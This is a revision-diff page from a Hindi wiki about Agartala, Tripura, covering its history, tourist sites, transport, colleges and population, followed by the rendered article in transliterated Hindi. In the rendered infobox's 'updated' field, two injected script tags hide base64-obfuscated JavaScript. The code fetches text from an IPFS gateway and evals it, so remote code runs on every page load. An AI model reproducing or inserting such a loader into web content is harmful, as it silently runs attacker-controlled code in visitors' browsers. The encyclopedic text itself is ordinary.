Difference between revisions of "अगरतला"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Adding category Category:भारत के नगर (को हटा दिया गया हैं।))
 
(2 intermediate revisions by one other user not shown)
Line 1: Line 1:
[[चित्र:Lake-Agartala-Tripura.jpg|thumb|250px|अगरतला में एक झील, [[त्रिपुरा]]]]
+
{{सूचना बक्सा पर्यटन
अगरतला शहर, [[त्रिपुरा]] राज्य की राजधानी है। अगरतला शहर पूर्वोत्तर [[भारत]], सघन [[कृषि]] वाले मैदान में [[बांग्लादेश]] की सीमा के निकट स्थित है। अनेक गाँवो के मध्य हवोवा नदी के आर-पार बसा यह शहर इस क्षेत्र का व्यापारिक केन्द्र है।  
+
|चित्र=Agartala-Palace-Tripura.jpg
 +
|चित्र का नाम=अगरतला पैलेस, त्रिपुरा
 +
|विवरण=अगरतला, [[त्रिपुरा]] राज्य की राजधानी है। अगरतला शहर [[पूर्वोत्तर भारत]], सघन कृषि वाले मैदान में [[बांग्लादेश]] की सीमा के निकट स्थित है।
 +
|राज्य=[[त्रिपुरा]]
 +
|केन्द्र शासित प्रदेश=
 +
|ज़िला=[[पश्चिम त्रिपुरा ज़िला|पश्चिम त्रिपुरा]]
 +
|निर्माता=
 +
|स्वामित्व=
 +
|प्रबंधक=
 +
|निर्माण काल=
 +
|स्थापना=सन 1850
 +
|भौगोलिक स्थिति=[http://maps.google.com/maps?q=23.5,91.5&ll=23.506385,91.499977&spn=0.136322,0.33165&t=m&z=12&iwloc=near उत्तर-23° 30' 0.00", पूर्व-91° 30' 0.00"]
 +
|मार्ग स्थिति=अगरतला, [[मिज़ोरम]] की राजधानी [[आइजोल]] के हवाई अड्डे से 295 किमी दूरी पर स्थित है।
 +
|मौसम=
 +
|तापमान=
 +
|प्रसिद्धि=
 +
|कब जाएँ=
 +
|कैसे पहुँचें=
 +
|हवाई अड्डा=सिंगरभिल हवाई अड्डा
 +
|रेलवे स्टेशन=अगरतला रेलवे स्टेशन
 +
|बस अड्डा=
 +
|यातायात=रिक्शा, टैक्सी, सिटी बस
 +
|क्या देखें=
 +
|कहाँ ठहरें=होटल, धर्मशाला, अतिथि ग्रह
 +
|क्या खायें=
 +
|क्या ख़रीदें=
 +
|एस.टी.डी. कोड=0381
 +
|ए.टी.एम=लगभग सभी
 +
|सावधानी=
 +
|मानचित्र लिंक=[http://maps.google.com/maps?saddr=Tripura,+India&daddr=Agartala,+Tripura,+India&hl=en&ll=23.853186,91.752319&spn=1.087664,2.653198&sll=23.831457,91.286778&sspn=0.135984,0.33165&geocode=FfBObQEduaB7BSmFosH2ZrVTNzF0_z9F53rdFA%3BFaGjawEd-uxwBSmnI0HJDfRTNzHHyEBsPCah0A&oq=t&mra=ls&t=m&z=9 गूगल मानचित्र]
 +
|संबंधित लेख=
 +
|शीर्षक 1=
 +
|पाठ 1=
 +
|शीर्षक 2=
 +
|पाठ 2=
 +
|अन्य जानकारी=अगरतला में [[बंगाली भाषा]] बोली जाती है और यहाँ हैंडलूम बुनाई का मुख्य उद्योग है। [[त्रिपुरा]] का अधिकतर भाग जंगलों से घिरा हुआ है, जो प्रकृति-प्रेमी पर्यटकों को आकर्षित करता है।
 +
|बाहरी कड़ियाँ=[http://tripura.nic.in/portal/ आधिकारिक वेबसाइट]
 +
|अद्यतन={{अद्यतन|16:55, 7 मई 2012 (IST)}}
 +
}}
 +
'''अगरतला''' [[त्रिपुरा]] राज्य की राजधानी है। अगरतला शहर [[पूर्वोत्तर भारत]], सघन [[कृषि]] वाले मैदान में [[बांग्लादेश]] की सीमा के निकट स्थित है। अनेक गाँवो के मध्य हवोवा नदी के आर-पार बसा यह शहर इस क्षेत्र का व्यापारिक केन्द्र है।  
 
==इतिहास==
 
==इतिहास==
 
अगरतला की स्थापना 1850 में महाराज राधा कृष्ण किशोर माणिक्य बहादुर द्वारा की गई थी।
 
अगरतला की स्थापना 1850 में महाराज राधा कृष्ण किशोर माणिक्य बहादुर द्वारा की गई थी।
 +
==पर्यटन स्थल==
 +
*अगरतला के आकर्षण का मुख्य केंद्र महाराजा राधा किशोर द्वारा सन [[1901]] में निर्मित उज्जयंत महल है। 
 +
*19वी शताब्दी में निर्मित जगन्नाथ मंदिर तथा चतुर्दशी देवता का मंदिर यहां स्थित प्रमुख मंदिर हैं।
 +
*अगरतला से 33 किलोमीटर दूर से सिपाही जला वनस्पतिक उद्यान तथा [[झील]] के लिए प्रसिद्ध है।
 +
*शहर से 55 किलोमीटर दूर रुद्रसागर झील में निर्मित नीरमहल भी दर्शनीय है।
 +
*अगरतला से 57 किलोमीटर दूर स्थित प्रसिद्ध त्रिपुरा सुंदरी मंदिर का निर्माण 16वीं शताब्दी के मध्य में हुआ था।
 
==यातायात और परिवहन==
 
==यातायात और परिवहन==
;<u>हवाई मार्ग</u>
+
====हवाई मार्ग====
 
अगरतला में अगरतला हवाई अड्डा स्थित है। यह वायु मार्ग द्वारा [[कोलकाता]], [[बेंगळूरू]], [[मुम्बई]], [[दिल्ली]] आदि विभिन्न शहरों से जुड़ा हुआ है। भारत के प्रमुख शहरों के लिए नियमित रूप से [[पटना]] में हवाई जहाज़ उपलब्ध हैं।
 
अगरतला में अगरतला हवाई अड्डा स्थित है। यह वायु मार्ग द्वारा [[कोलकाता]], [[बेंगळूरू]], [[मुम्बई]], [[दिल्ली]] आदि विभिन्न शहरों से जुड़ा हुआ है। भारत के प्रमुख शहरों के लिए नियमित रूप से [[पटना]] में हवाई जहाज़ उपलब्ध हैं।
[[चित्र:Agartala-Palace-Tripura.jpg|thumb|250px|left|अगरतला पैलेस, [[त्रिपुरा]]]]
+
[[चित्र:Lake-Agartala-Tripura.jpg|thumb|250px|left|अगरतला में एक झील, [[त्रिपुरा]]]]
;<u>रेल मार्ग</u>
+
====रेल मार्ग====
 
अगरतला का सबसे नज़दीकी रेलवे स्टेशन कुमारघाट है।
 
अगरतला का सबसे नज़दीकी रेलवे स्टेशन कुमारघाट है।
;<u>सड़क मार्ग</u>
+
====सड़क मार्ग====
 
अगरतला धलाई सड़कमार्ग द्वारा [[भारत]] के कई प्रमुख शहरों से जुड़ा हुआ है।
 
अगरतला धलाई सड़कमार्ग द्वारा [[भारत]] के कई प्रमुख शहरों से जुड़ा हुआ है।
  
 
==शिक्षण संस्थान==
 
==शिक्षण संस्थान==
[[चित्र:View-Of-Agartala.jpg|thumb|250px|अगरतला का एक दृश्य, [[त्रिपुरा]]]]
 
 
यहाँ एक मन्दिर के साथ-साथ त्रिपुरा विश्वविद्यालय से संबद्ध कई महाविद्यालय हैं। जिनमें महाराजा वीर विक्रम महाविद्यालय और त्रिपुरा इंजीनियरिंग कॉलेज शामिल हैं।  
 
यहाँ एक मन्दिर के साथ-साथ त्रिपुरा विश्वविद्यालय से संबद्ध कई महाविद्यालय हैं। जिनमें महाराजा वीर विक्रम महाविद्यालय और त्रिपुरा इंजीनियरिंग कॉलेज शामिल हैं।  
 
==पर्यटन==
 
==पर्यटन==
Line 19: Line 63:
 
==जनसंख्या==
 
==जनसंख्या==
 
[[2001]] की जनगणना के अनुसार अगरतला शहर की जनसंख्या 1,89,327 है।
 
[[2001]] की जनगणना के अनुसार अगरतला शहर की जनसंख्या 1,89,327 है।
 
+
[[चित्र:View-Of-Agartala.jpg|thumb|250px|अगरतला का एक दृश्य, [[त्रिपुरा]]|left]]
{{प्रचार}}
 
 
{{लेख प्रगति
 
{{लेख प्रगति
 
|आधार=
 
|आधार=
Line 33: Line 76:
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{प्रदेशों की राजधानी}}
 
{{प्रदेशों की राजधानी}}
{{भारत गणराज्य}}
+
{{त्रिपुरा के पर्यटन स्थल}}
 
__INDEX__
 
__INDEX__
 
__NOTOC__
 
__NOTOC__

Latest revision as of 12:17, 11 April 2018

agaratala
vivaran agaratala, tripura rajy ki rajadhani hai. agaratala shahar poorvottar bharat, saghan krishi vale maidan mean baangladesh ki sima ke nikat sthit hai.
rajy tripura
zila pashchim tripura
sthapana san 1850
bhaugolik sthiti uttar-23° 30' 0.00", poorv-91° 30' 0.00"
marg sthiti agaratala, mizoram ki rajadhani aijol ke havaee adde se 295 kimi doori par sthit hai.
havaee adda siangarabhil havaee adda
relave steshan agaratala relave steshan
yatayat riksha, taiksi, siti bas
kahaan thaharean hotal, dharmashala, atithi grah
es.ti.di. kod 0381
e.ti.em lagabhag sabhi
chitr:Map-icon.gif googal manachitr
any janakari agaratala mean bangali bhasha boli jati hai aur yahaan haiandaloom bunaee ka mukhy udyog hai. tripura ka adhikatar bhag jangaloan se ghira hua hai, jo prakriti-premi paryatakoan ko akarshit karata hai.
bahari k diyaan adhikarik vebasait
adyatan‎ <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

agaratala tripura rajy ki rajadhani hai. agaratala shahar poorvottar bharat, saghan krishi vale maidan mean baangladesh ki sima ke nikat sthit hai. anek gaanvo ke madhy havova nadi ke ar-par basa yah shahar is kshetr ka vyaparik kendr hai.

itihas

agaratala ki sthapana 1850 mean maharaj radha krishna kishor maniky bahadur dvara ki gee thi.

paryatan sthal

  • agaratala ke akarshan ka mukhy keandr maharaja radha kishor dvara san 1901 mean nirmit ujjayant mahal hai.
  • 19vi shatabdi mean nirmit jagannath mandir tatha chaturdashi devata ka mandir yahaan sthit pramukh mandir haian.
  • agaratala se 33 kilomitar door se sipahi jala vanaspatik udyan tatha jhil ke lie prasiddh hai.
  • shahar se 55 kilomitar door rudrasagar jhil mean nirmit niramahal bhi darshaniy hai.
  • agaratala se 57 kilomitar door sthit prasiddh tripura suandari mandir ka nirman 16vian shatabdi ke madhy mean hua tha.

yatayat aur parivahan

havaee marg

agaratala mean agaratala havaee adda sthit hai. yah vayu marg dvara kolakata, beangळooroo, mumbee, dilli adi vibhinn shaharoan se ju da hua hai. bharat ke pramukh shaharoan ke lie niyamit roop se patana mean havaee jahaz upalabdh haian. [[chitr:Lake-Agartala-Tripura.jpg|thumb|250px|left|agaratala mean ek jhil, tripura]]

rel marg

agaratala ka sabase nazadiki relave steshan kumaraghat hai.

s dak marg

agaratala dhalaee s dakamarg dvara bharat ke kee pramukh shaharoan se ju da hua hai.

shikshan sansthan

yahaan ek mandir ke sath-sath tripura vishvavidyalay se sanbaddh kee mahavidyalay haian. jinamean maharaja vir vikram mahavidyalay aur tripura ianjiniyariang k aaulej shamil haian.

paryatan

vidhanasabha bhavan mean tabdil ho chuka maharaja ka prachin british vastukala ka utkrisht udaharan hai. agaratala mean pramukh akarshan kendr ujh‍jaunta pailes, rajy sangrahalay, janajatiy sangrahalay, sukanta ekedami, em.bi.bi. k aaulej, lakshminarayan mandir, uma maheshh‍var mandir, jagannath mandir, benuban bihar, gedu min masjid, malaanch nivas, ravindr kanan, purabasha, hastashilp kendr, chaudahavaan devi mandir, charch adi haian.

janasankhya

2001 ki janaganana ke anusar agaratala shahar ki janasankhya 1,89,327 hai. [[chitr:View-Of-Agartala.jpg|thumb|250px|agaratala ka ek drishy, tripura|left]]

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

sanbandhit lekh